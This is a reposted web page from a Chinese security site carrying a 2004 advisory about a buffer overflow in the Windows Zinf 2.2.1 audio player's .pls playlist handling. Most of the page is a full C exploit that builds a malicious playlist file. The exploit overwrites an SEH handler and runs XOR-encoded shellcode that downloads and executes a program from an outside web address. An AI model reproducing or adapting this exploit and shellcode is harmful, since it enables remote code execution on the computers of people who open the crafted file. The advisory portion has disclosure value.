首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Remote exploit for Zinf 2.2.1 on Win32
来源:aluigi.altervista.org 作者:Luigi 发布时间:2004-10-02  

Remote exploit for Zinf 2.2.1 on Win32 that downloads and executes a file

/*
-------------------------------Advisory----------------------------------
Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>

I don't know why this bug has not been tracked but moreover I don't
completely know why it has not been fixed yet in the Windows version of
Zinf.

In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".

This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls file.

A simple proof-of-concept to test the bug is available here:

http://aluigi.altervista.org/poc/zinf-bof.pls

That's all, just to keep track of this bug and to warn who uses the Windows
version.


BYEZ
--------------------------------------------------------------------------
hey Luigi how much Advisories do you release every month??maybe 30 ;)??
sometimes i think your day has 48 hours ;)

best regards

----------------------------------------------------------------------------
this exploit generates a file exploit.pls which overflows a seh handler
jumps into a service pack independent address then it downloads and executes a file


you can also download this exploit i a rar file(www.delikon.de).
in this rar file you will find some screenshots, from OllyDbg
which is maybe useful for beginners


*/

#include <stdio.h>
#include <windows.h>

#define SIZE 4048


char shellcode[] = "\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";

int main(){

char buffer[SIZE];
char exploit[]="exploit.pls";
char head[]="[playlist]File1=";
int i=0;
ULONG bytes=0;
char *pointer=NULL;
//for the decoder
short int weblength=0xff22;


ULONG RetAddr=0x10404DC4;
/*
SERVICE PACK independent
httpinput.pmi
10404DC4 5D POP EBP
10404DC5 B8 18000000 MOV EAX,18
10404DCA 5B POP EBX
10404DCB C2 0800 RETN 8
*/
//jump into nops
DWORD jump=0x909025eb;
HANDLE file=NULL;

//this is a small messageBox app
char web[]="http://www.delikon.de/klein.exe";


printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
printf("Coded by Delikon|www.delikon.de|27.9.04\n");
printf("all credits goes to Luigi Auriemma\n");
printf("\n [+] generate exploit.pls\n");

memset(buffer,0x00,SIZE-1);


file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

if(file == (HANDLE)0xffffffff){

printf("\t[+] error opening the file\n");
printf("PRESS A KEY\n");
getchar();
return -1;

}
strcpy(buffer,head);

memset(buffer+strlen(buffer),0x61,17);
//nops
memset(buffer+strlen(buffer),0x90,20);
//
strcat(buffer,shellcode);
//search for the shellcode length
pointer=strstr(buffer,"\x22\xff");
//weblength[0]-=strlen(web)+1;
weblength-=strlen(web)+1;
//increase it
memcpy(pointer,&weblength,2);

//copy the url in the buffer
strcat(buffer,web);


//xor the url with 0x1d
while(*(buffer+strlen(buffer)-strlen(web)+i)){


*(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
i++;
}

*(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

//copy the filling
memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
//also filling ;)
memcpy(buffer+strlen(buffer),&RetAddr,4);

memset(buffer+strlen(buffer),0x41,4);
memset(buffer+strlen(buffer),0x42,4);

//jump 24 bytes forward
memcpy(buffer+strlen(buffer),&jump,4);
//jump into pop reg pop reg ret
memcpy(buffer+strlen(buffer),&RetAddr,4);
memset(buffer+strlen(buffer),0x45,4);
memset(buffer+strlen(buffer),0x46,4);
memset(buffer+strlen(buffer),0x47,4);

WriteFile(file,buffer,strlen(buffer),&bytes,0);

CloseHandle(file);
printf("\n [+] ready press a key\n");
getchar();


exit(1);


}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows JPEG GDI+ All in One R
·Microsoft SQL Server远程拒绝服
·Windows JPEG Downloader Toolki
·BroadBoard Instant ASP Message
·0x00 vs ASP file upload script
·Serendipity 0.7-beta1 SQL Inje
·glFTPd local stack buffer over
·GNU SharUtils <= 4.2.1 Loca
·Mdaemon smtp server v6.5.1 exp
·MyServer 0.7.1 Post Denial Of
·Mdaemon IMAP server v6.5.1 Rem
·YahooPOPS Remote Buffer Everfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved